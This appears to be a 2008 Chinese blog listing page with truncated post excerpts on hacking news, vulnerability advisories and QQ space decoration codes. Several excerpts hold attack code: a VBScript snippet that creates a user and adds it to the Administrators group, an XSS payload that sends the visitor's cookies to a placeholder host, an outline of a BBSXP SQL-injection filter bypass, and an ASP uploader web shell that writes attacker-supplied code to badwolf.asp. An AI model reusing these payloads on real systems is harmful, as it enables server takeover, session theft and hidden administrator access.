2008-04-29 14:29
2008-04-02 14:28
4月2日消息,据国外媒体报道,全球黑客大赛的获胜者谢恩•麦考利(Shane Macaulay)周一在eBay上公开出售被自己攻破的笔记本,据称其中可能保留了比赛中使用的完整攻击代码。
上周五,由谢恩•麦考利等人组成的小组攻破了一台安装Vista操作系统的富士通U810笔记本,随后根据大赛规定,麦考利除了获得奖金, |
2008-03-29 17:06
3月29日消息,据国外媒体报道,在日前举行的CanSecWest安全大会上,苹果新一代操作系统Leopard在30秒钟内即被黑客成功入侵。
成功入侵Leopard系统的黑客是ISE公司安全研究员Charlie Miller,以成功入侵苹果iPhone手机而闻名。据悉,Miller利用的是苹果Safari浏览器漏洞,只用了30 |
2008-03-20 00:06
新快报讯(钟欣)香港律政司向法庭申请撤销装修工人钟亦天涉及“发布淫亵物品”的控罪,并要求无条件释放他,昨日获得批准。
据香港媒体即时消息报道,控方指出,由于淫审处已将涉及照片裁定为不雅,故要求撤销钟亦天涉及“发布淫亵物品”的控罪,并无条件释放他,获得裁判官批准。在近日闹得沸沸扬扬的香港女星裸照事件中,警方以“发布淫亵物品”控罪起诉钟亦天,但由于淫亵物品审裁处日前应媒体要求就5张裸照作评级,其中3张照片被评为“不雅物品”,钟亦天被控发布 |
2008-03-14 16:58
最近Real Networks RealPlayer问题大了,接连有漏洞爆出,大量木马作者也开始关注这一入侵手段,今天'rmoc3260.dll' ActiveX控件再曝内存破坏漏洞,并允许任意代码执行,更为危险的是,这一漏洞已经有攻击代码公布.
受影响版本:
Real Networks rmoc3260.dll 6.0.10 45
Real Networks RealPlayer 11
描述:
BUGTRAQ ID: 28157
CNCAN ID:CNCAN-2008031113
Real Networks RealPlayer是一款流行的媒体播放程序。
Real Networks RealPlayer包含的'rmoc3260.dll' Ac |
2008-03-13 00:13
US-CERT近日警告用户,一个利用最新Microsoft Excel的未修补漏洞的木马已经出现,鉴于这一漏洞影响非常普遍且危害性高,安全人员希望用户提高警惕.
安全小组提醒,近日在接收到未知确切来源的电子邮件时,千万不要打开其中所包含的Excel附件,这将让未经修补的Excel漏洞直接被木马激活并侵入电脑.
该木马通 |
2008-03-12 15:43
2008-03-11 16:25
2008-03-07 13:13
★
set wsnetwork=CreateObject("WSCRIPT.NETWORK")
os="WinNT://"&wsnetwork.ComputerName
Set ob=GetObject(os) ’得到adsi接口,绑定
Set oe=GetObject(os&"/Administrators,group") ’属性,admin组
Set od=ob.Create("user","join") ’建立用 |
2008-03-04 11:19
比如发现一处可XSS地方:<script>alert(不管怎么样弹出就好)</script>
自己弄个偷cookie的文件。
目的是让其他浏览者去浏览我们设计好的陷阱
<script>document.location=' http://URL.com/cookie.php?cookie='+escape(document.cookie) </script>
怎么弄其实也不用我多说了。。
现在主要说的是如何隐藏JavaScript执行。
大家可能习惯每天去milw0rm.com看EXP,
每 |
2008-03-04 11:10
2008-02-29 00:14
空间透明公告栏代码:
透明公告栏`LOOK javascript:window.top.space_addItem(12,1238,0,0,96,96,1)
透明公告栏LOVELETTER javascript:window.top.space_addItem(12,1072,0,0,96,96,1)
透明公告栏`爱情碰碰杯 javascript:window.top.space_addItem(12,1073,0,0,96,96,1)
--------------------------------------------------------------------------------------------------------------
空间导航代码 :
更新 粉色女生 :javascript:window.top.space_addItem(13,9758,0,0,200,600,0);
竖着的五星: |
2008-02-27 11:58
注:本站首发,转载请保留,谢谢!
http://www.neeao.com
Neeao's Security Blog
-------------------------------------
By YaMato[BCT]
Date:2008-2-22
Version:BBSXP 7.3-BBSXP2008 sql
漏洞分析:
官方最新过滤函数HTMLEncode,这次过滤了字符* ,再一次绕过过滤注射
Function HTMLEncode(fString)
fString=Replace(fString,CHR(9),"")
fString=Replace(fString,CHR(13),"")
fString=Replace(fString,CHR(22),"")
fString=Replace(fS |
2008-02-24 16:38
超级浓缩diy.asp上传小马!上传自动在同目录生成badwolf.asp
<%set s=server.createObject(”Adodb.Stream”)%>
<%s.Type=2%>
<%s.Open%>
<%s.CharSet=”gb2312″%>
<%s.writetext request(”d”)%>
<%s.SaveToFile server.mappath(”badwolf.asp”),2%>
<%s.Close%>
<%set s=nothing%>
<form>
<textarea name=d cols=80 rows=10 width=32></textarea |
2008-02-20 14:21
各色“冒牌澄清”充斥网络,“陈冠希”成新兴代名词
“艳照门”事件对于警方来说是一个法律事件,对于道德观察家来说是一个关于道德的典型案例。而对于一些网民来说,也许此事 | |
|
|
54598288
男, 28岁
河北 石家庄
上次登录:
2008年10月
 加为好友
|
送他礼物
发送消息
